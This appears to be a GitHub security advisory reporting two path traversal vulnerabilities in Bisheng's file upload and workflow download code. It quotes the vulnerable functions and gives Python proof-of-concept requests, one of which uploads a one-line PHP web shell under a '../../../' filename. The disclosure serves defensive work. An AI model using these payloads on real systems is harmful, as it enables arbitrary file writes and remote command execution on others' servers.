Skip to content

Two Critical Path TraversalVulnerabilities in Bisheng #1994

@Ro1ME

Description

@Ro1ME

Severity: Critical
CVSS Score: 9.1 (Vulnerabilities #1, #2)
Affected Versions: Latest version (as of 2026-04-20)
Attack Vector: Network (HTTP API)
Vulnerability Count:2

  • 2 Path Traversal vulnerabilities (CBD-B5)

Vulnerability Details

Vulnerability #1: Path Traversal in save_download_file (CBD-B5)

Location: src/backend/bisheng/core/cache/utils.py:290-349
Entry Point: src/backend/bisheng/api/v1/workstation.py:177 (knowledgeUpload endpoint)
CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
CVSS 3.1: 9.1 (Critical)

Vulnerable Code

@create_cache_folder
def save_download_file(file_input: Union[bytes, BinaryIO], folder_name: str, filename: str) -> str:
    """
    Synchronous I/O intensive tasks:
    Write data stream to a temporary file
    Simultaneously calculate SHA256
    Rename a file based on the hash
    """
    
    # Convert to stream objects
    if isinstance(file_input, bytes):
        src_stream = BytesIO(file_input)
    else:
        src_stream = file_input
        if hasattr(src_stream, 'seek'):
            src_stream.seek(0)
    
    # Prepare a temporary file
    cache_path = Path(CACHE_DIR)
    folder_path = cache_path / folder_name
    
    # Create the folder if it doesn't exist
    if not folder_path.exists():
        folder_path.mkdir(exist_ok=True)
    
    temp_filename = f"tmp_{uuid4().hex}"
    temp_file_path = folder_path / temp_filename
    
    sha256_hash = hashlib.sha256()
    
    try:
        # Write to temporary file and calculate SHA256 simultaneously
        with open(temp_file_path, 'wb') as dst_file:
            chunk_size = 65536  # 64KB
            while True:
                chunk = src_stream.read(chunk_size)
                if not chunk:
                    break
                sha256_hash.update(chunk)
                dst_file.write(chunk)
        
        # calculate final hash
        file_hash = sha256_hash.hexdigest()
        
        # Logic for handling filename length limits
        safe_filename = filename
        if len(filename) > 60:
            safe_filename = filename[-60:]  # VULNERABILITY: Takes last 60 chars, preserves path traversal
        
        final_file_name = f'{file_hash}_{safe_filename}'  # VULNERABILITY: No path validation
        final_file_path = folder_path / final_file_name  # Path traversal possible here
        
        # Rename (Move) Temporary File to Final Path
        if final_file_path.exists():
            os.remove(temp_file_path)
            return str(final_file_path)
        
        shutil.move(str(temp_file_path), str(final_file_path))  # VULNERABILITY: Moves to traversed path
        return str(final_file_path)

Root Cause: The filename parameter from user upload is used directly without sanitization. When constructing final_file_path = folder_path / final_file_name, if final_file_name contains path traversal sequences like ../../, the resulting path can escape the intended cache directory.

HTTP API Entry Point

# src/backend/bisheng/api/v1/workstation.py:172-182
@router.post('/knowledgeUpload')
def knowledgeUpload(request: Request,
                    background_tasks: BackgroundTasks,
                    file: UploadFile = File(...),
                    login_user: UserPayload = Depends(UserPayload.get_login_user)):
    try:
        file_path = save_download_file(file.file, 'bisheng', file.filename)  # VULNERABLE
        res = WorkStationService.uploadPersonalKnowledge(request,
                                                         login_user,
                                                         file_path=file_path,
                                                         background_tasks=background_tasks)
        return resp_200(data=res[0])

Vulnerability #2: Path Traversal in _download_file (CBD-B5)

Location: src/backend/bisheng/linsight/domain/task_exec.py:225-246
CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
CVSS 3.1: 9.1 (Critical)

Vulnerable Code

async def _download_file(self, file_info: dict, target_dir: str) -> str:
    """Download individual files"""
    object_name = file_info["markdown_file_path"]
    file_name = file_info.get("markdown_filename", os.path.basename(object_name))
    file_path = os.path.join(target_dir, file_name)  # VULNERABILITY: No path validation
    minio_client = await get_minio_storage()
    try:
        file_url = await minio_client.get_share_link(object_name, clear_host=False)
        http_client = await get_http_client()
        
        with open(file_path, "wb") as f:  # VULNERABILITY: Writes to traversed path
            async for chunk in http_client.stream(method="GET", url=str(file_url)):
                f.write(chunk)
        
        if not os.path.exists(file_path) or os.path.getsize(file_path) == 0:
            raise ValueError(f"File download failed or empty: {object_name}")
        
        return file_path
    
    except Exception as e:
        logger.error(f"Download failed {object_name}: {e}")
        raise

Root Cause: The file_name from file_info dictionary (which can be user-controlled via workflow configuration) is directly joined with target_dir using os.path.join(). If file_name contains path traversal sequences, the file will be written outside the intended directory.

Proof of Concept

PoC #1: Exploiting save_download_file via knowledgeUpload

import requests

# Bisheng API endpoint
url = "http://localhost:3001/api/v1/workstation/knowledgeUpload"

# Malicious filename with path traversal
malicious_content = b"<?php system($_GET['cmd']); ?>"

files = {
    'file': ('../../../tmp/bisheng_pwned.php', malicious_content, 'application/octet-stream')
}

# Authenticated request (replace with valid token)
headers = {
    'Authorization': 'Bearer YOUR_AUTH_TOKEN'
}

response = requests.post(url, files=files, headers=headers)
print(response.json())

Expected Result: File written to /tmp/bisheng_pwned.php instead of cache directory.

Verification:

ls -la /tmp/bisheng_pwned.php
# File should exist outside the cache directory

PoC #2: Exploiting _download_file via Linsight Workflow

import requests

# Linsight workflow execution endpoint
url = "http://localhost:3001/api/v1/linsight/workflow/execute"

# Malicious workflow configuration
payload = {
    "session_id": "test_session",
    "files": [
        {
            "markdown_file_path": "legitimate/path/file.md",
            "markdown_filename": "../../../tmp/linsight_pwned.txt"  # Path traversal
        }
    ]
}

headers = {
    'Authorization': 'Bearer YOUR_AUTH_TOKEN',
    'Content-Type': 'application/json'
}

response = requests.post(url, json=payload, headers=headers)
print(response.json())

Expected Result: File downloaded to /tmp/linsight_pwned.txt instead of workflow directory.


Impact

Security Impact

  1. Arbitrary File Write (Vulnerabilities add langchain_contrib module #2, Add bisheng-unstructured submodule #3):

    • Attackers can write files to any location accessible by the Bisheng process
    • Can overwrite existing files including application code and configuration
  2. Configuration Tampering:

    • Overwrite configuration files, credentials, or environment files
    • Modify database connection strings to redirect data
  3. Privilege Escalation:

    • If Bisheng runs with elevated privileges, attackers can write to system directories
    • Can create cron jobs, systemd services, or other persistence mechanisms
  4. Data Integrity:

    • Overwrite legitimate application files or user data
    • Corrupt application state or databases

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions